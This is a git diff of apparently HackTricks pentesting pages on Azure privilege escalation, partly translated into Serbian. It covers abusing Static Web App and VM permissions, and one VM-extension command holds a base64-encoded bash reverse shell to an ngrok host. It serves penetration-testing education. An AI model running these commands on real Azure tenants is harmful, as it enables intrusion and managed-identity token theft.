"https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//resetapikey?api-version=2019-08-01" +--url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//resetapikey?api-version=2019-08-01" ``` - ### Microsoft.Web/staticSites/createUserInvitation/action -This permission allows to **create an invitation to a user** to access protected paths inside a static web app ith a specific given role. 
- -The login is located in a path such as `/.auth/login/github` for github or `/.auth/login/aad` for Entra ID and a user can be invited with the following command: +Ova dozvola omogućava **kreiranje pozivnice za korisnika** da pristupi zaštićenim putanjama unutar statičke web aplikacije sa određenom dodeljenom ulogom. +Prijava se nalazi na putanji kao što je `/.auth/login/github` za github ili `/.auth/login/aad` za Entra ID, a korisnik može biti pozvan sledećom komandom: ```bash az staticwebapp users invite \ - --authentication-provider Github # AAD, Facebook, GitHub, Google, Twitter \ - --domain mango-beach-071d9340f.4.azurestaticapps.net # Domain of the app \ - --invitation-expiration-in-hours 168 # 7 days is max \ - --name my-first-static-web-app # Name of the app\ - --roles "contributor,administrator" # Comma sepparated list of roles\ - --user-details username # Github username in this case\ - --resource-group Resource_Group_1 # Resource group of the app +--authentication-provider Github # AAD, Facebook, GitHub, Google, Twitter \ +--domain mango-beach-071d9340f.4.azurestaticapps.net # Domain of the app \ +--invitation-expiration-in-hours 168 # 7 days is max \ +--name my-first-static-web-app # Name of the app\ +--roles "contributor,administrator" # Comma sepparated list of roles\ +--user-details username # Github username in this case\ +--resource-group Resource_Group_1 # Resource group of the app ``` - ### Pull Requests -By default Pull Requests from a branch in the same repo will be automatically compiled and build in a staging environment. This could be abused by an attacker with write access over the repo but without being able to bypass branch protections of the production branch (usually `main`) to **deploy a malicious version of the app** in the statagging URL. +Podrazumevano, Pull Requests iz grane u istom repozitorijumu će biti automatski kompajlirani i izgrađeni u staging okruženju. 
Ovo bi moglo biti zloupotrebljeno od strane napadača sa pristupom za pisanje u repozitorijum, ali bez mogućnosti da zaobiđe zaštitu grane produkcijske grane (obično `main`) da **implementira zloćudnu verziju aplikacije** u staging URL-u. -The staging URL has this format: `https://-..` like: `https://ambitious-plant-0f764e00f-2.eastus2.4.azurestaticapps.net` +Staging URL ima ovaj format: `https://-..` kao: `https://ambitious-plant-0f764e00f-2.eastus2.4.azurestaticapps.net` > [!TIP] -> Note that by default external PRs won't run workflows unless they have merged at least 1 PR into the repository. An attacker could send a valid PR to the repo and **then send a malicious PR** to the repo to deploy the malicious app in the stagging environment. HOWEVER, there is an unexpected protection, the default Github Action to deploy into the static web app need access to the secret containing the deployment token (like `secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_PLANT_0F764E00F`) eve if the deployment is done with the IDToken. This means that because an external PR won't have access to this secret and an external PR cannot change the Workflow to place here an arbitrary token without a PR getting accepted, **this attack won't really work**. - +> Imajte na umu da podrazumevano spoljašnji PR-ovi neće pokretati radne tokove osim ako nisu spojili barem 1 PR u repozitorijum. Napadač bi mogao poslati validan PR u repozitorijum i **zatim poslati zloćudni PR** u repozitorijum da implementira zloćudnu aplikaciju u staging okruženju. MEĐUTIM, postoji neočekivana zaštita, podrazumevani Github Action za implementaciju u statičku web aplikaciju treba pristup tajni koja sadrži token za implementaciju (kao što je `secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_PLANT_0F764E00F`) čak i ako se implementacija vrši sa IDToken-om. 
To znači da pošto spoljašnji PR neće imati pristup ovoj tajni i spoljašnji PR ne može promeniti Workflow da ovde postavi proizvoljni token bez da PR bude prihvaćen, **ova napad neće zaista uspeti**. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md index f569966f8..a26ebb2fd 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md @@ -34,7 +34,7 @@ az vm extension set \ --settings '{}' \ --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}' ``` -- Izvršite skriptu smeštenu na internetu +- Izvršite skriptu koja se nalazi na internetu ```bash az vm extension set \ --resource-group rsc-group> \ @@ -65,7 +65,7 @@ az vm extension set \ --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand 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"}' ``` -- Izvrši reverznu ljusku iz fajla +- Izvrši reverznu ljusku iz datoteke ```bash az vm extension set \ --resource-group \ 
@@ -105,7 +105,7 @@ Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Na DesiredConfigurationState (DSC) -Ovo je **VM ekstenzija** koja pripada Microsoftu i koristi PowerShell DSC za upravljanje konfiguracijom Azure Windows VM-ova. Stoga se može koristiti za **izvršavanje proizvoljnih komandi** u Windows VM-ovima putem ove ekstenzije: +Ovo je **VM ekstenzija** koja pripada Microsoftu i koristi PowerShell DSC za upravljanje konfiguracijom Azure Windows VMs. Stoga se može koristiti za **izvršavanje proizvoljnih komandi** u Windows VMs putem ove ekstenzije: ```bash # Content of revShell.ps1 Configuration RevShellConfig { @@ -157,7 +157,7 @@ Set-AzVMDscExtension ` Hibridni Runbook Radnik -Ovo je VM ekstenzija koja bi omogućila izvršavanje runbook-ova u VM-ovima iz automatskog naloga. Za više informacija pogledajte [Automatske naloge](../az-services/az-automation-account/index.html). +Ovo je VM ekstenzija koja bi omogućila izvršavanje runbook-ova u VM-ovima iz automatskog naloga. Za više informacija pogledajte [Automation Accounts service](../az-services/az-automation-account/index.html). 
@@ -308,9 +308,9 @@ Ova dozvola omogućava korisniku da **prijavi kao korisnik u VM putem SSH ili RD Prijavite se putem **SSH** sa **`az ssh vm --name --resource-group `** i putem **RDP** sa vašim **redovnim Azure akreditivima**. -## `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` +### `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` -Sve ove dozvole su neophodne da bi se **napravio VM sa specifičnom upravljanom identitetom** i ostavio **port otvoren** (22 u ovom slučaju). Ovo omogućava korisniku da kreira VM i poveže se na njega i **ukrade tokene upravljane identitete** kako bi eskalirao privilegije na njega. +Sve ove dozvole su neophodne da se **kreira VM sa specifičnom upravljanom identitetom** i da se ostavi **port otvoren** (22 u ovom slučaju). Ovo omogućava korisniku da kreira VM i poveže se na njega i **ukrade tokene upravljane identitete** kako bi eskalirao privilegije na njega. U zavisnosti od situacije, može biti potrebno više ili manje dozvola za zloupotrebu ove tehnike. ```bash 
@@ -327,7 +327,7 @@ az vm create \ ``` ### `Microsoft.Compute/virtualMachines/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` -Ove dozvole su dovoljne da **dodelite nove upravljane identitete VM-u**. Imajte na umu da VM može imati nekoliko upravljanih identiteta. Može imati **sistemsku dodeljenu identitet**, i **mnoge korisnički upravljane identitete**.\ +Ove dozvole su dovoljne da **dodelite nove upravljane identitete VM-u**. Imajte na umu da VM može imati nekoliko upravljanih identiteta. Može imati **sistemsku dodeljenu identitet** i **mnogo korisnički upravljanih identiteta**.\ Zatim, iz servisa za metapodatke moguće je generisati tokene za svaki od njih. ```bash # Get currently assigned managed identities to the VM 
@@ -343,13 +343,13 @@ az vm identity assign \ /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \ /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2 ``` -Zatim napadač treba da **na neki način kompromituje VM** kako bi ukrao tokene iz dodeljenih upravljanih identiteta. Proverite **više informacija u**: +Napadač mora **neki način kompromitovati VM** da bi ukrao tokene iz dodeljenih upravljanih identiteta. Proverite **više informacija u**: {{#ref}} https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm {{#endref}} -### "Microsoft.Compute/virtualMachines/read","Microsoft.Compute/virtualMachines/write","Microsoft.Compute/virtualMachines/extensions/read","Microsoft.Compute/virtualMachines/extensions/write" +### Microsoft.Compute/virtualMachines/read, Microsoft.Compute/virtualMachines/write, Microsoft.Compute/virtualMachines/extensions/read, Microsoft.Compute/virtualMachines/extensions/write Ove dozvole omogućavaju promenu korisnika i lozinke virtuelne mašine za pristup: ```bash 
@@ -359,8 +359,24 @@ az vm user update \ --username \ --password ``` +### Microsoft.Compute/virtualMachines/write, "Microsoft.Compute/virtualMachines/read", "Microsoft.Compute/disks/read", "Microsoft.Network/networkInterfaces/read", "Microsoft.Network/networkInterfaces/join/action", "Microsoft.Compute/disks/write". + +Ove dozvole vam omogućavaju da upravljate diskovima i mrežnim interfejsima, i omogućavaju vam da priključite disk na virtuelnu mašinu. +```bash +# Update the disk's network access policy +az disk update \ +--name \ +--resource-group \ +--network-access-policy AllowAll + +# Attach the disk to a virtual machine +az vm disk attach \ +--vm-name \ +--resource-group \ +--name +``` ### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action -Prema [**dokumentaciji**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), ova dozvola vam omogućava da upravljate operativnim sistemom vašeg resursa putem Windows Admin Center-a kao administrator. Tako da izgleda da ovo daje pristup WAC-u za kontrolu VM-ova... +Prema [**dokumentaciji**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), ova dozvola vam omogućava da upravljate operativnim sistemom vašeg resursa putem Windows Admin Centra kao administrator. Tako da izgleda da ovo daje pristup WAC-u za kontrolu VM-ova... {{#include ../../../banners/hacktricks-training.md}}